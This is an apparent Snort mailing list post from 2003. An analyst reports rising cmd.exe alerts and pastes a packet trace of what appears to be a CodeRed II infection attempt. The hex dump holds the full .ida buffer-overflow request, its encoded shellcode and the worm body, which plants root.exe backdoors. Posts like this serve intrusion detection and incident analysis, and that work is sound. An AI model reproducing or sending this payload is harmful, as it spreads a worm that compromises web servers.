Snort mailing list archives
Re: different CMD.exe access?!?
From: Bamm Visscher <bamm () satx rr com>
Date: Tue, 11 Mar 2003 10:48:32 -0600
I am seeing the same thing from all over (I've been grumblin in #snort all morning). Looks like maybe a variant of CodeRed, could another worm be infecting hosts and then spawning CodeRed scans? At first I thought it was a change in configuration on the network somewhere but the amount of traffic I am seeing is steadily increasing. From 0900-1000(GMT) I had 4 cmd.exe alerts. From 1000-1100: 59 From 1100-1200: 429 From 1200-1300: 1245 From 1300-1400: 1645 From 1400-1500: 1869 From 1500-1600: 1973 Bammkkkk ************* Warning Big Session Trace Below ************************ Reading network traffic from "/var/log/snort/rawdata/2003-03-11/wmst-ids01/wmst-ids01_0311_61.180.83.4:4975-162.18.223.169:80.raw" file. snaplen = 1514 --== Initialization Complete ==-- 03/11-16:01:53.174297 61.180.83.4:4975 -> 162.18.223.169:80 TCP TTL:105 TOS:0x0 ID:2756 IpLen:20 DgmLen:48 DF ******S* Seq: 0x445C789E Ack: 0x0 Win: 0x4000 TcpLen: 28 TCP Options (4) => MSS: 1460 NOP NOP SackOK 0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E. 0x0010: 00 30 0A C4 40 00 69 06 F4 8F 3D B4 53 04 A2 12 .0..@.i...=.S... 0x0020: DF A9 13 6F 00 50 44 5C 78 9E 00 00 00 00 70 02 ...o.PD\x.....p. 0x0030: 40 00 5F F1 00 00 02 04 05 B4 01 01 04 02 @._........... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:53.175053 162.18.223.169:80 -> 61.180.83.4:4975 TCP TTL:64 TOS:0x0 ID:3403 IpLen:20 DgmLen:44 ***A**S* Seq: 0x4216D51D Ack: 0x445C789F Win: 0x4000 TcpLen: 24 TCP Options (1) => MSS: 512 0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E. 0x0010: 00 2C 0D 4B 00 00 40 06 5B 0D A2 12 DF A9 3D B4 .,.K..@.[.....=. 0x0020: 53 04 00 50 13 6F 42 16 D5 1D 44 5C 78 9F 60 12 S..P.oB...D\x.`. 0x0030: 40 00 61 67 00 00 02 04 02 00 00 00 @.ag........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:53.652042 61.180.83.4:4975 -> 162.18.223.169:80 TCP TTL:105 TOS:0x0 ID:2818 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x445C789F Ack: 0x4216D51E Win: 0x4000 TcpLen: 20 0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E. 0x0010: 00 28 0B 02 40 00 69 06 F4 59 3D B4 53 04 A2 12 .(..@.i..Y=.S... 0x0020: DF A9 13 6F 00 50 44 5C 78 9F 42 16 D5 1E 50 10 ...o.PD\x.B...P. 0x0030: 40 00 75 70 00 00 00 00 00 00 00 00 @.up........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:53.668739 61.180.83.4:4975 -> 162.18.223.169:80 TCP TTL:105 TOS:0x0 ID:2819 IpLen:20 DgmLen:552 DF ***A**** Seq: 0x445C789F Ack: 0x4216D51E Win: 0x4000 TcpLen: 20 0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E. 0x0010: 02 28 0B 03 40 00 69 06 F2 58 3D B4 53 04 A2 12 .(..@.i..X=.S... 0x0020: DF A9 13 6F 00 50 44 5C 78 9F 42 16 D5 1E 50 10 ...o.PD\x.B...P. 0x0030: 40 00 18 77 00 00 47 45 54 20 2F 64 65 66 61 75 @..w..GET /defau 0x0040: 6C 74 2E 69 64 61 3F 58 58 58 58 58 58 58 58 58 lt.ida?XXXXXXXXX 0x0050: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0x0060: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0x0070: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0x0080: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0x0090: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0x00A0: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0x00B0: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0x00C0: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0x00D0: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0x00E0: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0x00F0: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0x0100: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0x0110: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX 0x0120: 58 58 58 58 58 58 58 25 75 39 30 39 30 25 75 36 XXXXXXX%u9090%u6 0x0130: 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 25 858%ucbd3%u7801% 0x0140: 75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64 u9090%u6858%ucbd 0x0150: 33 25 75 37 38 30 31 25 75 39 30 39 30 25 75 36 3%u7801%u9090%u6 0x0160: 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31 25 858%ucbd3%u7801% 0x0170: 75 39 30 39 30 25 75 39 30 39 30 25 75 38 31 39 u9090%u9090%u819 0x0180: 30 25 75 30 30 63 33 25 75 30 30 30 33 25 75 38 0%u00c3%u0003%u8 0x0190: 62 30 30 25 75 35 33 31 62 25 75 35 33 66 66 25 b00%u531b%u53ff% 0x01A0: 75 30 30 37 38 25 75 30 30 30 30 25 75 30 30 3D u0078%u0000%u00= 0x01B0: 61 20 20 48 54 54 50 2F 31 2E 30 0D 0A 43 6F 6E a HTTP/1.0..Con 0x01C0: 74 65 6E 74 2D 74 79 70 65 3A 20 74 65 78 74 2F tent-type: text/ 0x01D0: 78 6D 6C 0A 43 6F 6E 74 65 6E 74 2D 6C 65 6E 67 xml.Content-leng 0x01E0: 74 68 3A 20 33 33 37 39 20 0D 0A 0D 0A C8 C8 01 th: 3379 ....... 0x01F0: 00 60 E8 03 00 00 00 CC EB FE 64 67 FF 36 00 00 .`........dg.6.. 0x0200: 64 67 89 26 00 00 E8 DF 02 00 00 68 04 01 00 00 dg.&.......h.... 0x0210: 8D 85 5C FE FF FF 50 FF 55 9C 8D 85 5C FE FF FF ..\...P.U...\... 0x0220: 50 FF 55 98 8B 40 10 8B 08 89 8D 58 FE FF FF FF P.U..@.....X.... 0x0230: 55 E4 3D 04 04 00 U.=... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:53.672406 162.18.223.169:80 -> 61.180.83.4:4975 TCP TTL:64 TOS:0x0 ID:3413 IpLen:20 DgmLen:40 ***A**** Seq: 0x4216D51E Ack: 0x445C7A9F Win: 0x4000 TcpLen: 20 0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E. 0x0010: 00 28 0D 55 00 00 40 06 5B 07 A2 12 DF A9 3D B4 .(.U..@.[.....=. 0x0020: 53 04 00 50 13 6F 42 16 D5 1E 44 5C 7A 9F 50 10 S..P.oB...D\z.P. 0x0030: 40 00 73 70 00 00 00 00 00 00 00 00 @.sp........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:53.674969 61.180.83.4:4975 -> 162.18.223.169:80 TCP TTL:105 TOS:0x0 ID:2820 IpLen:20 DgmLen:552 DF ***A**** Seq: 0x445C7A9F Ack: 0x4216D51E Win: 0x4000 TcpLen: 20 0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E. 0x0010: 02 28 0B 04 40 00 69 06 F2 57 3D B4 53 04 A2 12 .(..@.i..W=.S... 0x0020: DF A9 13 6F 00 50 44 5C 7A 9F 42 16 D5 1E 50 10 ...o.PD\z.B...P. 0x0030: 40 00 8E A6 00 00 00 0F 94 C1 3D 04 08 00 00 0F @.........=..... 0x0040: 94 C5 0A CD 0F B6 C9 89 8D 54 FE FF FF 8B 75 08 .........T....u. 0x0050: 81 7E 30 9A 02 00 00 0F 84 C4 00 00 00 C7 46 30 .~0...........F0 0x0060: 9A 02 00 00 E8 0A 00 00 00 43 6F 64 65 52 65 64 .........CodeRed 0x0070: 49 49 00 8B 1C 24 FF 55 D8 66 0B C0 0F 95 85 38 II...$.U.f.....8 0x0080: FE FF FF C7 85 50 FE FF FF 01 00 00 00 6A 00 8D .....P.......j.. 0x0090: 85 50 FE FF FF 50 8D 85 38 FE FF FF 50 8B 45 08 .P...P..8...P.E. 0x00A0: FF 70 08 FF 90 84 00 00 00 80 BD 38 FE FF FF 01 .p.........8.... 0x00B0: 74 68 53 FF 55 D4 FF 55 EC 01 45 84 69 BD 54 FE thS.U..U..E.i.T. 0x00C0: FF FF 2C 01 00 00 81 C7 2C 01 00 00 E8 D2 04 00 ..,.....,....... 0x00D0: 00 F7 D0 0F AF C7 89 46 34 8D 45 88 50 6A 00 FF .......F4.E.Pj.. 0x00E0: 75 08 E8 05 00 00 00 E9 01 FF FF FF 6A 00 6A 00 u...........j.j. 0x00F0: FF 55 F0 50 FF 55 D0 4F 75 D2 E8 3B 05 00 00 69 .U.P.U.Ou..;...i 0x0100: BD 54 FE FF FF 00 5C 26 05 81 C7 00 5C 26 05 57 .T....\&....\&.W 0x0110: FF 55 E8 6A 00 6A 16 FF 55 8C 6A FF FF 55 E8 EB .U.j.j..U.j..U.. 0x0120: F9 8B 46 34 29 45 84 6A 64 FF 55 E8 8D 85 3C FE ..F4)E.jd.U...<. 0x0130: FF FF 50 FF 55 C0 0F B7 85 3C FE FF FF 3D 88 88 ..P.U....<...=.. 0x0140: 00 00 73 CF 0F B7 85 3E FE FF FF 83 F8 0A 73 C3 ..s....>......s. 0x0150: 66 C7 85 70 FF FF FF 02 00 66 C7 85 72 FF FF FF f..p.....f..r... 0x0160: 00 50 E8 64 04 00 00 89 9D 74 FF FF FF 6A 00 6A .P.d.....t...j.j 0x0170: 01 6A 02 FF 55 B8 83 F8 FF 74 F2 89 45 80 6A 01 .j..U....t..E.j. 0x0180: 54 68 7E 66 04 80 FF 75 80 FF 55 A4 59 6A 10 8D Th~f...u..U.Yj.. 0x0190: 85 70 FF FF FF 50 FF 75 80 FF 55 B0 BB 01 00 00 .p...P.u..U..... 0x01A0: 00 0B C0 74 4B 33 DB FF 55 94 3D 33 27 00 00 75 ...tK3..U.=3'..u 0x01B0: 3F C7 85 68 FF FF FF 0A 00 00 00 C7 85 6C FF FF ?..h.........l.. 0x01C0: FF 00 00 00 00 C7 85 60 FF FF FF 01 00 00 00 8B .......`........ 0x01D0: 45 80 89 85 64 FF FF FF 8D 85 68 FF FF FF 50 6A E...d.....h...Pj 0x01E0: 00 8D 85 60 FF FF FF 50 6A 00 6A 01 FF 55 A0 93 ...`...Pj.j..U.. 0x01F0: 6A 00 54 68 7E 66 04 80 FF 75 80 FF 55 A4 59 83 j.Th~f...u..U.Y. 0x0200: FB 01 75 31 E8 00 00 00 00 58 2D D3 03 00 00 6A ..u1.....X-....j 0x0210: 00 68 EA 0E 00 00 50 FF 75 80 FF 55 AC 3D EA 0E .h....P.u..U.=.. 0x0220: 00 00 75 11 6A 00 6A 01 8D 85 5C FE FF FF 50 FF ..u.j.j...\...P. 0x0230: 75 80 FF 55 A8 FF u..U.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:53.872341 162.18.223.169:80 -> 61.180.83.4:4975 TCP TTL:64 TOS:0x0 ID:3418 IpLen:20 DgmLen:40 ***A**** Seq: 0x4216D51E Ack: 0x445C7C9F Win: 0x4000 TcpLen: 20 0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E. 0x0010: 00 28 0D 5A 00 00 40 06 5B 02 A2 12 DF A9 3D B4 .(.Z..@.[.....=. 0x0020: 53 04 00 50 13 6F 42 16 D5 1E 44 5C 7C 9F 50 10 S..P.oB...D\|.P. 0x0030: 40 00 71 70 00 00 00 00 00 00 00 00 @.qp........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:54.087339 61.180.83.4:4975 -> 162.18.223.169:80 TCP TTL:105 TOS:0x0 ID:2856 IpLen:20 DgmLen:552 DF ***A**** Seq: 0x445C7C9F Ack: 0x4216D51E Win: 0x4000 TcpLen: 20 0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E. 0x0010: 02 28 0B 28 40 00 69 06 F2 33 3D B4 53 04 A2 12 .(.(@.i..3=.S... 0x0020: DF A9 13 6F 00 50 44 5C 7C 9F 42 16 D5 1E 50 10 ...o.PD\|.B...P. 0x0030: 40 00 DB 74 00 00 75 80 FF 55 B4 E9 E7 FE FF FF @..t..u..U...... 0x0040: BB 00 00 DF 77 81 C3 00 00 01 00 81 FB 00 00 00 ....w........... 0x0050: 78 75 05 BB 00 00 F0 BF 60 E8 0E 00 00 00 8B 64 xu......`......d 0x0060: 24 08 64 67 8F 06 00 00 58 61 EB D9 64 67 FF 36 $.dg....Xa..dg.6 0x0070: 00 00 64 67 89 26 00 00 66 81 3B 4D 5A 75 E3 8B ..dg.&..f.;MZu.. 0x0080: 4B 3C 81 3C 0B 50 45 00 00 75 D7 8B 54 0B 78 03 K<.<.PE..u..T.x. 0x0090: D3 8B 42 0C 81 3C 03 4B 45 52 4E 75 C5 81 7C 03 ..B..<.KERNu..|. 0x00A0: 04 45 4C 33 32 75 BB 33 C9 49 8B 72 20 03 F3 FC .EL32u.3.I.r ... 0x00B0: 41 AD 81 3C 03 47 65 74 50 75 F5 81 7C 03 04 72 A..<.GetPu..|..r 0x00C0: 6F 63 41 75 EB 03 4A 10 49 D1 E1 03 4A 24 0F B7 ocAu..J.I...J$.. 0x00D0: 0C 0B C1 E1 02 03 4A 1C 8B 04 0B 03 C3 89 44 24 ......J.......D$ 0x00E0: 24 64 67 8F 06 00 00 58 61 C3 E8 51 FF FF FF 89 $dg....Xa..Q.... 0x00F0: 5D FC 89 45 F8 E8 0D 00 00 00 4C 6F 61 64 4C 69 ]..E......LoadLi 0x0100: 62 72 61 72 79 41 00 FF 75 FC FF 55 F8 89 45 F4 braryA..u..U..E. 0x0110: E8 0D 00 00 00 43 72 65 61 74 65 54 68 72 65 61 .....CreateThrea 0x0120: 64 00 FF 75 FC FF 55 F8 89 45 F0 E8 0D 00 00 00 d..u..U..E...... 0x0130: 47 65 74 54 69 63 6B 43 6F 75 6E 74 00 FF 75 FC GetTickCount..u. 0x0140: FF 55 F8 89 45 EC E8 06 00 00 00 53 6C 65 65 70 .U..E......Sleep 0x0150: 00 FF 75 FC FF 55 F8 89 45 E8 E8 17 00 00 00 47 ..u..U..E......G 0x0160: 65 74 53 79 73 74 65 6D 44 65 66 61 75 6C 74 4C etSystemDefaultL 0x0170: 61 6E 67 49 44 00 FF 75 FC FF 55 F8 89 45 E4 E8 angID..u..U..E.. 0x0180: 14 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 ....GetSystemDir 0x0190: 65 63 74 6F 72 79 41 00 FF 75 FC FF 55 F8 89 45 ectoryA..u..U..E 0x01A0: E0 E8 0A 00 00 00 43 6F 70 79 46 69 6C 65 41 00 ......CopyFileA. 0x01B0: FF 75 FC FF 55 F8 89 45 DC E8 10 00 00 00 47 6C .u..U..E......Gl 0x01C0: 6F 62 61 6C 46 69 6E 64 41 74 6F 6D 41 00 FF 75 obalFindAtomA..u 0x01D0: FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C 6F 62 ..U..E......Glob 0x01E0: 61 6C 41 64 64 41 74 6F 6D 41 00 FF 75 FC FF 55 alAddAtomA..u..U 0x01F0: F8 89 45 D4 E8 0C 00 00 00 43 6C 6F 73 65 48 61 ..E......CloseHa 0x0200: 6E 64 6C 65 00 FF 75 FC FF 55 F8 89 45 D0 E8 08 ndle..u..U..E... 0x0210: 00 00 00 5F 6C 63 72 65 61 74 00 FF 75 FC FF 55 ..._lcreat..u..U 0x0220: F8 89 45 CC E8 08 00 00 00 5F 6C 77 72 69 74 65 ..E......_lwrite 0x0230: 00 FF 75 FC FF 55 ..u..U =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:54.101265 61.180.83.4:4975 -> 162.18.223.169:80 TCP TTL:105 TOS:0x0 ID:2857 IpLen:20 DgmLen:552 DF ***A**** Seq: 0x445C7E9F Ack: 0x4216D51E Win: 0x4000 TcpLen: 20 0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E. 0x0010: 02 28 0B 29 40 00 69 06 F2 32 3D B4 53 04 A2 12 .(.)@.i..2=.S... 0x0020: DF A9 13 6F 00 50 44 5C 7E 9F 42 16 D5 1E 50 10 ...o.PD\~.B...P. 0x0030: 40 00 8E BD 00 00 F8 89 45 C8 E8 08 00 00 00 5F @.......E......_ 0x0040: 6C 63 6C 6F 73 65 00 FF 75 FC FF 55 F8 89 45 C4 lclose..u..U..E. 0x0050: E8 0E 00 00 00 47 65 74 53 79 73 74 65 6D 54 69 .....GetSystemTi 0x0060: 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 E8 0B 00 00 me..u..U..E..... 0x0070: 00 57 53 32 5F 33 32 2E 44 4C 4C 00 FF 55 F4 89 .WS2_32.DLL..U.. 0x0080: 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00 FF 75 E......socket..u 0x0090: BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C 6F 73 ..U..E......clos 0x00A0: 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 esocket..u..U..E 0x00B0: B4 E8 0C 00 00 00 69 6F 63 74 6C 73 6F 63 6B 65 ......ioctlsocke 0x00C0: 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 08 00 00 00 t..u..U..E...... 0x00D0: 63 6F 6E 6E 65 63 74 00 FF 75 BC FF 55 F8 89 45 connect..u..U..E 0x00E0: B0 E8 07 00 00 00 73 65 6C 65 63 74 00 FF 75 BC ......select..u. 0x00F0: FF 55 F8 89 45 A0 E8 05 00 00 00 73 65 6E 64 00 .U..E......send. 0x0100: FF 75 BC FF 55 F8 89 45 AC E8 05 00 00 00 72 65 .u..U..E......re 0x0110: 63 76 00 FF 75 BC FF 55 F8 89 45 A8 E8 0C 00 00 cv..u..U..E..... 0x0120: 00 67 65 74 68 6F 73 74 6E 61 6D 65 00 FF 75 BC .gethostname..u. 0x0130: FF 55 F8 89 45 9C E8 0E 00 00 00 67 65 74 68 6F .U..E......getho 0x0140: 73 74 62 79 6E 61 6D 65 00 FF 75 BC FF 55 F8 89 stbyname..u..U.. 0x0150: 45 98 E8 10 00 00 00 57 53 41 47 65 74 4C 61 73 E......WSAGetLas 0x0160: 74 45 72 72 6F 72 00 FF 75 BC FF 55 F8 89 45 94 tError..u..U..E. 0x0170: E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C 4C 00 .....USER32.DLL. 0x0180: FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69 74 57 .U..E......ExitW 0x0190: 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55 F8 89 indowsEx..u..U.. 0x01A0: 45 8C C3 8B 45 84 69 C0 05 84 08 08 40 89 45 84 E...E.i.....@.E. 0x01B0: 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 C3 E8 E1 FF ...xV4.......... 0x01C0: FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ED FF FF FF ..<.t.<.t....... 0x01D0: 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 E8 DC FF FF ................ 0x01E0: FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 FF FF FF 83 ................ 0x01F0: E0 07 E8 20 00 00 00 FF FF FF FF 00 FF FF FF 00 ... ............ 0x0200: FF FF FF 00 FF FF FF 00 FF FF FF 00 00 FF FF 00 ................ 0x0210: 00 FF FF 00 00 FF FF 59 8B 04 81 23 D8 F7 D0 23 .......Y...#...# 0x0220: 85 58 FE FF FF 0B D8 80 FB 7F 74 9F 80 FB E0 74 .X........t....t 0x0230: 9A 3B 9D 58 FE FF .;.X.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:54.101525 162.18.223.169:80 -> 61.180.83.4:4975 TCP TTL:64 TOS:0x0 ID:3422 IpLen:20 DgmLen:40 ***A**** Seq: 0x4216D51E Ack: 0x445C809F Win: 0x4000 TcpLen: 20 0x0000: 00 30 A3 10 C8 01 00 A0 8E 40 5F 50 08 00 45 00 .0.......@_P..E. 0x0010: 00 28 0D 5E 00 00 40 06 5A FE A2 12 DF A9 3D B4 .(.^..@.Z.....=. 0x0020: 53 04 00 50 13 6F 42 16 D5 1E 44 5C 80 9F 50 10 S..P.oB...D\..P. 0x0030: 40 00 6D 70 00 00 00 00 00 00 00 00 @.mp........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:54.378026 61.180.83.4:4975 -> 162.18.223.169:80 TCP TTL:105 TOS:0x0 ID:2877 IpLen:20 DgmLen:552 DF ***A**** Seq: 0x445C809F Ack: 0x4216D51E Win: 0x4000 TcpLen: 20 0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E. 0x0010: 02 28 0B 3D 40 00 69 06 F2 1E 3D B4 53 04 A2 12 .(.=@.i...=.S... 0x0020: DF A9 13 6F 00 50 44 5C 80 9F 42 16 D5 1E 50 10 ...o.PD\..B...P. 0x0030: 40 00 36 F3 00 00 FF 74 92 C3 68 04 01 00 00 8D @.6....t..h..... 0x0040: 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE FF FF .\...P.U....\... 0x0050: E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00 5E FC .....\CMD.EXE.^. 0x0060: A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A 5C 69 ....cj......d:\i 0x0070: 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 5C 72 netpub\scripts\r 0x0080: 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D 85 5C oot.exe...$....\ 0x0090: FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00 64 3A ...P.U.j..+...d: 0x00A0: 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D 6F 6E \progra~1\common 0x00B0: 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44 43 5C ~1\system\MSADC\ 0x00C0: 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D 85 root.exe...$.... 0x00D0: 5C FE FF FF 50 FF 55 DC E8 BA 05 00 00 FC 4D 5A \...P.U.......MZ 0x00E0: 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 B8 00 P............... 0x00F0: 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC FC FC ......@......... 0x0100: FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD 2A 25 .....PE..L....*% 0x0110: 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B 01 02 )............... 0x0120: 19 00 04 00 00 00 08 00 00 00 00 00 00 00 10 00 ................ 0x0130: 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 ...... ....@.... 0x0140: 00 00 04 00 00 01 00 00 00 00 00 00 00 03 00 0A ................ 0x0150: 00 00 00 00 00 00 40 00 00 00 04 00 00 00 00 00 ......@......... 0x0160: 00 02 00 00 00 00 00 10 00 00 20 00 00 00 00 10 .......... ..... 0x0170: 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 ................ 0x0180: 00 00 00 00 00 00 30 00 00 0C 01 FC FC FC 00 00 ......0......... 0x0190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x01A0: 00 00 00 00 00 00 00 00 00 10 00 00 00 10 00 00 ................ 0x01B0: 00 04 00 00 00 08 00 00 00 00 00 00 00 00 00 00 ................ 0x01C0: 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 .... ..`........ 0x01D0: 00 10 00 00 00 20 00 00 00 04 00 00 00 0C 00 00 ..... .......... 0x01E0: 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 ............@... 0x01F0: 00 00 00 00 00 00 00 00 00 10 00 00 00 30 00 00 .............0.. 0x0200: 00 04 00 00 00 10 00 00 00 00 00 00 00 00 00 00 ................ 0x0210: 00 00 00 00 40 00 00 C0 FC FC FC FC FC FC FC FC ....@........... 0x0220: FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................ 0x0230: FC FC FC FC FC FC ...... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 03/11-16:01:54.390442 61.180.83.4:4975 -> 162.18.223.169:80 TCP TTL:105 TOS:0x0 ID:2878 IpLen:20 DgmLen:552 DF ***A**** Seq: 0x445C829F Ack: 0x4216D51E Win: 0x4000 TcpLen: 20 0x0000: 00 A0 8E 40 5F 50 00 30 A3 10 C8 01 08 00 45 00 ...@_P.0......E. 0x0010: 02 28 0B 3E 40 00 69 06 F2 1D 3D B4 53 04 A2 12 .(.>@.i...=.S... 0x0020: DF A9 13 6F 00 50 44 5C 82 9F 42 16 D5 1E 50 10 ...o.PD\..B...P. 0x0030: 40 00 62 77 00 00 FC FC FC FC FC FC FC FC FC FC @.bw............ 0x0040: FC FC FC FC 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x0050: 00 00 00 00 68 04 01 00 00 68 D0 20 40 00 E8 61 ....h....h. @..a 0x0060: 01 00 00 8D B8 D0 20 40 00 BE 00 20 40 00 A5 A5 ...... @... @... 0x0070: A5 A5 6A 01 68 D0 20 40 00 E8 4C 01 00 00 E8 0C ..j.h. @..L..... 0x0080: 00 00 00 68 C0 27 09 00 E8 31 01 00 00 EB EF 68 ...h.'...1.....h 0x0090: D8 24 40 00 68 3F 00 0F 00 6A 00 68 10 20 40 00 .$@.h?...j.h. @. 0x00A0: 68 02 00 00 80 E8 32 01 00 00 0B C0 75 26 6A 04 h.....2.....u&j. 0x00B0: 68 54 20 40 00 6A 04 6A 00 68 48 20 40 00 FF 35 hT @.j.j.hH @..5 0x00C0: D8 24 40 00 E8 0D 01 00 00 FF 35 D8 24 40 00 E8 .$@.......5.$@.. 0x00D0: 0E 01 00 00 68 D8 24 40 00 68 3F 00 0F 00 6A 00 ....h.$@.h?...j. 0x00E0: 68 58 20 40 00 68 02 00 00 80 E8 ED 00 00 00 0B hX @.h.......... 0x00F0: C0 75 55 BD 9C 20 40 00 E8 4C 00 00 00 BD A8 20 .uU.. @..L..... 0x0100: 40 00 E8 42 00 00 00 6A 09 68 B8 20 40 00 6A 01 @..B...j.h. @.j. 0x0110: 6A 00 68 B0 20 40 00 FF 35 D8 24 40 00 E8 B4 00 j.h. @..5.$@.... 0x0120: 00 00 6A 09 68 C4 20 40 00 6A 01 6A 00 68 B4 20 ..j.h. @.j.j.h. 0x0130: 40 00 FF 35 D8 24 40 00 E8 99 00 00 00 FF 35 D8 @..5.$@.......5. 0x0140: 24 40 00 E8 9A 00 00 00 C3 C7 05 D0 24 40 00 00 $@..........$@.. 0x0150: 04 00 00 68 D0 24 40 00 68 D0 20 40 00 68 D4 24 ...h.$@.h. @.h.$ 0x0160: 40 00 6A 00 55 FF 35 D8 24 40 00 E8 60 00 00 00 @.j.U.5.$@..`... 0x0170: 0B C0 75 49 A1 D0 24 40 00 0B C0 74 40 BE D0 20 ..uI..$@...t@.. 0x0180: 40 00 80 3E 00 74 36 46 66 81 7E FE 2C 2C 75 F2 @..>.t6Ff.~.,,u. 0x0190: C7 06 32 31 37 00 81 EE CC 20 40 00 89 35 D0 24 ..217.... @..5.$ 0x01A0: 40 00 FF 35 D0 24 40 00 68 D0 20 40 00 6A 01 6A @..5.$@.h. @.j.j 0x01B0: 00 55 FF 35 D8 24 40 00 E8 19 00 00 00 C3 FF 25 .U.5.$@........% 0x01C0: 60 30 40 00 FF 25 64 30 40 00 FF 25 68 30 40 00 `0@..%d0@..%h0@. 0x01D0: FF 25 70 30 40 00 FF 25 74 30 40 00 FF 25 78 30 .%p0@..%t0@..%x0 0x01E0: 40 00 FF 25 7C 30 40 FC FC FC FC FC FC FC FC 